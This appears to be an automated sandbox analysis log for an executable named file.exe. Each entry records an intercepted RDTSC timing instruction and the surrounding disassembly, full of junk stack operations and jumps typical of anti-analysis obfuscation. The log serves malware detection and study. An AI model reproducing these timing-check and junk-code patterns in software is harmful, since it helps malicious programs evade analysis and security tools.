                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BE8F second address: 1038865 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F72FCCFD2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cx, AC80h 0x0000000f lea eax, dword ptr [ebp+1248DB95h] 0x00000015 or edx, 03092200h 0x0000001b nop 0x0000001c pushad 0x0000001d jmp 00007F72FCCFD307h 0x00000022 ja 00007F72FCCFD2FCh 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F72FCCFD305h 0x00000030 pop edx 0x00000031 nop 0x00000032 mov cx, 3622h 0x00000036 call dword ptr [ebp+122D31B6h] 0x0000003c pushad 0x0000003d pushad 0x0000003e push eax 0x0000003f pop eax 0x00000040 push edx 0x00000041 pop edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C0A9 second address: 105C0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C0AD second address: 105C0B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C0B3 second address: 105C0B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C0B8 second address: 105C0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F72FCCFD306h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C4F0 second address: 105C529 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF3DBD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b js 00007F72FCF3DBCCh 0x00000011 jp 00007F72FCF3DBC6h 0x00000017 jnc 00007F72FCF3DBC8h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jno 00007F72FCF3DBC6h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C529 second address: 105C533 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C533 second address: 105C562 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jns 00007F72FCF3DBC8h 0x00000010 jmp 00007F72FCF3DBCEh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C562 second address: 105C59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F72FCCFD2F8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 push 5BD6FE77h 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b jng 00007F72FCCFD2F6h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C9FB second address: 105CA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CD09 second address: 105CD14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F72FCCFD2F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CD14 second address: 105CD71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F72FCC0D451h 0x0000000d nop 0x0000000e cmc 0x0000000f push 0000001Eh 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F72FCC0D448h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b add cx, E6DCh 0x00000030 mov edx, dword ptr [ebp+122D3A4Ah] 0x00000036 or dword ptr [ebp+122D1C0Dh], edx 0x0000003c nop 0x0000003d pushad 0x0000003e jne 00007F72FCC0D448h 0x00000044 push ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D144 second address: 105D148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D148 second address: 105D14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D14E second address: 105D1DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F72FCF2ACC8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 xor dword ptr [ebp+122D2F54h], esi 0x0000002a sub dword ptr [ebp+122D2F17h], eax 0x00000030 lea eax, dword ptr [ebp+1248DB95h] 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F72FCF2ACC8h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 mov ecx, 1B179946h 0x00000055 jmp 00007F72FCF2ACD7h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push edi 0x00000060 pop edi 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D1DC second address: 105D1E6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F72FCC0D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10850D3 second address: 10850EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F72FCF2ACD1h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108526C second address: 1085275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085275 second address: 108527B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108527B second address: 1085281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085281 second address: 1085285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085285 second address: 108528B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108528B second address: 1085295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085515 second address: 108551E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E47C second address: 108E482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E482 second address: 108E486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E486 second address: 108E4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F72FCF2ACD9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E4A9 second address: 108E4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E4AD second address: 108E4B7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F72FCF2ACC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D657 second address: 108D65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D65B second address: 108D665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F72FCF2ACC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D665 second address: 108D66E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D66E second address: 108D693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCF2ACD9h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D693 second address: 108D699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D699 second address: 108D6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F72FCF2ACDBh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D862 second address: 108D86A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D9F0 second address: 108D9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D9F4 second address: 108D9FE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F72FCC0D446h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D9FE second address: 108DA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F72FCF2ACC6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DB66 second address: 108DB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F72FCC0D446h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DB74 second address: 108DB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F72FCF2ACCCh 0x0000000f jbe 00007F72FCF2ACC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DD2D second address: 108DD53 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F72FCC0D458h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F72FCC0D452h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DD53 second address: 108DD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F72FCF2ACC6h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DD60 second address: 108DD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F72FCC0D45Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DD84 second address: 108DD95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F72FCF2ACC6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DEC5 second address: 108DEC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DEC9 second address: 108DEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F72FCF2ACD2h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F72FCF2ACCFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E328 second address: 108E332 instructions: 0x00000000 rdtsc 0x00000002 js 00007F72FCC0D44Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E332 second address: 108E33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F72FCF2ACCCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA1C second address: 108CA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCC0D455h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA35 second address: 108CA39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA39 second address: 108CA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA3F second address: 108CA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCF2ACCAh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA4F second address: 108CA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA5E second address: 108CA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA62 second address: 108CA7B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F72FCC0D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F72FCC0D44Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA7B second address: 108CA8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092BF2 second address: 1092BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10932E1 second address: 10932F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F72FCF2ACD0h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10932F6 second address: 10932FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10932FB second address: 109331A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F72FCF2ACD1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10938E7 second address: 10938F9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F72FCC0D44Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10981A0 second address: 10981A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10194EC second address: 10194FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F72FCC0D446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10194FB second address: 101950B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCF2ACCAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AD3B second address: 109AD55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F72FCC0D446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F72FCC0D44Eh 0x00000012 push eax 0x00000013 pop eax 0x00000014 jns 00007F72FCC0D446h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109CF08 second address: 109CF0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006B29 second address: 1006B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F72FCC0D44Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006B3C second address: 1006B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACCFh 0x00000007 jmp 00007F72FCF2ACD5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0F1E second address: 10A0F22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0F22 second address: 10A0F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F72FCF2ACC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0F31 second address: 10A0F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A108C second address: 10A10BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F72FCF2ACDCh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F72FCF2ACCEh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1575 second address: 10A1579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1579 second address: 10A1596 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F72FCF2ACC6h 0x00000008 jns 00007F72FCF2ACC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F72FCF2ACCBh 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1596 second address: 10A15AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCC0D453h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A15AD second address: 10A15B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5E3E second address: 10A5E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5FA3 second address: 10A5FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCF2ACD8h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5FC0 second address: 10A5FC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5FC5 second address: 10A5FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A63F4 second address: 10A640C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCC0D454h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CB74 second address: 105CB85 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F72FCF2ACC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA8BF second address: 10AA8CF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F72FCC0D448h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA8CF second address: 10AA8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1EC6 second address: 10B1EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F72FCC0D456h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFEA8 second address: 10AFEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFEAC second address: 10AFEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F72FCC0D44Ch 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jne 00007F72FCC0D446h 0x00000014 jmp 00007F72FCC0D44Bh 0x00000019 popad 0x0000001a push edi 0x0000001b push eax 0x0000001c pop eax 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B003D second address: 10B0049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
